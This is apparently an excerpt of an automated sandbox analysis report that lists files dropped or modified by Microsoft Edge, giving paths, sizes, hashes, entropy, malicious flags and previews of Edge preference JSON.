File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	true
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0125f40a-81f4-4b90-b64e-fa714bfde452.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46321
Entropy (8bit):	6.093343989662904
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6JrecAb3cGoup1Xl3jVzXr4CO:b/Ps+wsI7yO9wf6Dxrochu3VlXr4CRoR
MD5:	059C040CE216078B8B2A4E824061151B
SHA1:	3EC8CE96BF2705B29DC9CC7B1858C800264ABCEA
SHA-256:	9CA1EA8BC6DAA8B7B1F1B7AB33F25591CDA79C88A0AB842FB11E7396B03B97F1
SHA-512:	CA1552ED246C1016FC50C79D6D4BC6EC0F0BCB3FAFEE270C2E8221F49309B6097A8DCFA56B5BC77CCF81C7D6EC12765E6EED7A79FE80BC61B88AFC5B6B79206D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\149d46db-602a-4a5d-94dd-16886683b758.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	47186
Entropy (8bit):	6.094533602315292
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jretx7b3cGoup1Xl3jVzXr4r:b/Ps+wsI7yO9wf6Dxrwchu3VlXr4CRoR
MD5:	0264F001FF5F0577AF4B7B6C09FD6458
SHA1:	76EA646389F62E7EDD9DC621A7910BEB4F7B6CD6
SHA-256:	7F9E2FD3995697F3CF8A8F619590C415CC694FBD773C206BAF5987C39EE72F1F
SHA-512:	84DD91A8E86C42F357BEA17D1EC22C66FC33F514DDA9D8F4B33D7C0F4194EC82A5F8336457E03153A1D3B4325AC586DFA1089B82CA26A9562F44F6106FE7B653
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\19c56446-a072-4962-8fde-54d0c65d64cd.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1e090cf0-79cc-47d9-abb8-ba6fcace19fe.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46321
Entropy (8bit):	6.093327811081409
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jre4lb3cGoup1Xl3jVzXr4Cj:b/Ps+wsI7yO9wf6Dxrrchu3VlXr4CRoI
MD5:	2D3174ECB00F257998FC1A848FBCB3FC
SHA1:	D50BBAEBC6FF7E1D831F7BA47C3E2E115D49A3DA
SHA-256:	DBA26D82FD5B2079DABB74A64B314D4D83A1548F6C24530138BEA2E2633A57F4
SHA-512:	A1A699D5B0C56A79EB728D09EA0737E0A3B5D4C876CB4AE4DBE3985A72F5D75B098C65A5E54CD17FEB09A96FAB4623F93F49AF6CEC6FB82FD1627590240D1F36
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\266621b7-2856-4b9b-822a-85708d84b033.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	47185
Entropy (8bit):	6.094559814470782
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6JretGTb3cGoup1Xl3jVzXr4r:b/Ps+wsI7yO9wf6DxrZchu3VlXr4CRoR
MD5:	D38C9C3E6ABC0612A65D9FF9C365ACDA
SHA1:	AD2D73B1EB7598EBB41DCF5B28D6C90FDEBA9BDE
SHA-256:	696C7DC94C2BDE099F919837BD8CE2898F525876526B563A0088B79AC5874D90
SHA-512:	EB17EC534998E1DEBD397F50565D18E59ED6623F64CCC90004A94339AF56B23A963A1B4E79B5B26C33455CEBA8E774AAA4C6264348AE9153BF0551EA9EB6156D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4b2aa279-546e-40ef-b8d7-daf2db1b3c94.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	46321
Entropy (8bit):	6.093342945646091
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jrez0b3cGoup1Xl3jVzXr4Cj:b/Ps+wsI7yO9wf6DxrPchu3VlXr4CRoI
MD5:	A59ED78D6A1303AC8566A6A98F837525
SHA1:	72CA640EDAECE7EEB84195F6FB5C442A52477AD2
SHA-256:	AD242BC63C4D1B58DA3C94D8B9BBEAD590345AEAABC7956D007E7BFAFA44D3C7
SHA-512:	8222F3E7CB77492D214A605FD7FF8EB0314A9237139B039EEC1F11D28E97CB2171D9445942AE077496DB9912210AD52DEE1F7FEC3AFDBFF7AADAF11AE970BA63
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4f2b9593-a8e9-458b-bee5-b02c02c692a6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44640
Entropy (8bit):	6.095565665772922
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBwwuvhDO6vP6OjE6J6zbES06+cGoup1Xl3jVzXr4z:z/Ps+wsI7ynE36Dx5chu3VlXr4CRo1
MD5:	30C9D4AD9153DCBE5CE0C462F5819348
SHA1:	6D68C59DB6D81B8B3360333F3E9335F0A76463BC
SHA-256:	AA599BB230C272D3AB291D3D0EBED783D74AEBD1204D587CE615266E129A282D
SHA-512:	347697D2305A48B28FB7722F9C1AAF967428C63E16E498BAFB8CBFCD8D53032601279225499D4FD6F28CFC62BDC88620A8DDFFAB423B13D49803A8D9FA112C19
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5a08a26b-76ad-4705-b44d-21c5c5aa78bf.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45493
Entropy (8bit):	6.092605055020019
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6JPdbh/pehcGoup1Xl3jVzXrD:b/Ps+wsI7yO9wf6DxOchu3VlXr4CRoI
MD5:	B92AE72D6BB06FEC47957B786906EEAB
SHA1:	CF9E8197CBA2F1233C492645AF3AA73CEC64B517
SHA-256:	C078EE95F6E320F53AC803C54AFAFBFCAFE217E82CBDE01CE3161AA487898F44
SHA-512:	81E636927F40463C935FDA32A1C635C416155CA0CE5D43389B70891911E139F4ECCFA30A61707010D95B57012174DFD89E678F6BF5BC6CB575772FE31F1D29B1
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6327e6a6-c8bc-4ba7-914a-62cd5687937e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44718
Entropy (8bit):	6.0955275272908995
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkBrwuvhDO6vP6OjE6Jygbh/pehcGoup1Xl3jVzXr4z:z/Ps+wsI7yOEW6DxAchu3VlXr4CRo1
MD5:	76E8EDF54373F805D53944B741C36184
SHA1:	BD148037091B5105D8A19CC59C2D16EF9AAA3C56
SHA-256:	5900495CDA6EC8E0F5434FA25DBCEAA026FDC94239BFB69B02FA99BF1861E7F7
SHA-512:	1EA759891E08BDCAD1ED23EE6E1F415B16C30C46B4FABDDA4582D8FADF5CF06784547088B8D70BF0A11344AE9E995A467BAA3CA913E57701FC927DED44B0ED48
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\85c0f9bd-081a-4a03-b22d-a78f6acc0d81.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	47185
Entropy (8bit):	6.094559814470782
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6JretGTb3cGoup1Xl3jVzXr4r:b/Ps+wsI7yO9wf6DxrZchu3VlXr4CRoR
MD5:	D38C9C3E6ABC0612A65D9FF9C365ACDA
SHA1:	AD2D73B1EB7598EBB41DCF5B28D6C90FDEBA9BDE
SHA-256:	696C7DC94C2BDE099F919837BD8CE2898F525876526B563A0088B79AC5874D90
SHA-512:	EB17EC534998E1DEBD397F50565D18E59ED6623F64CCC90004A94339AF56B23A963A1B4E79B5B26C33455CEBA8E774AAA4C6264348AE9153BF0551EA9EB6156D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\888a9e5b-f100-40d7-8e00-4bc933c27862.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	47186
Entropy (8bit):	6.094533602315292
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jretx7b3cGoup1Xl3jVzXr4r:b/Ps+wsI7yO9wf6Dxrwchu3VlXr4CRoR
MD5:	0264F001FF5F0577AF4B7B6C09FD6458
SHA1:	76EA646389F62E7EDD9DC621A7910BEB4F7B6CD6
SHA-256:	7F9E2FD3995697F3CF8A8F619590C415CC694FBD773C206BAF5987C39EE72F1F
SHA-512:	84DD91A8E86C42F357BEA17D1EC22C66FC33F514DDA9D8F4B33D7C0F4194EC82A5F8336457E03153A1D3B4325AC586DFA1089B82CA26A9562F44F6106FE7B653
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8d96452a-4168-4204-af79-422396311638.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46321
Entropy (8bit):	6.093342945646091
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jrez0b3cGoup1Xl3jVzXr4Cj:b/Ps+wsI7yO9wf6DxrPchu3VlXr4CRoI
MD5:	A59ED78D6A1303AC8566A6A98F837525
SHA1:	72CA640EDAECE7EEB84195F6FB5C442A52477AD2
SHA-256:	AD242BC63C4D1B58DA3C94D8B9BBEAD590345AEAABC7956D007E7BFAFA44D3C7
SHA-512:	8222F3E7CB77492D214A605FD7FF8EB0314A9237139B039EEC1F11D28E97CB2171D9445942AE077496DB9912210AD52DEE1F7FEC3AFDBFF7AADAF11AE970BA63
Malicious:	false
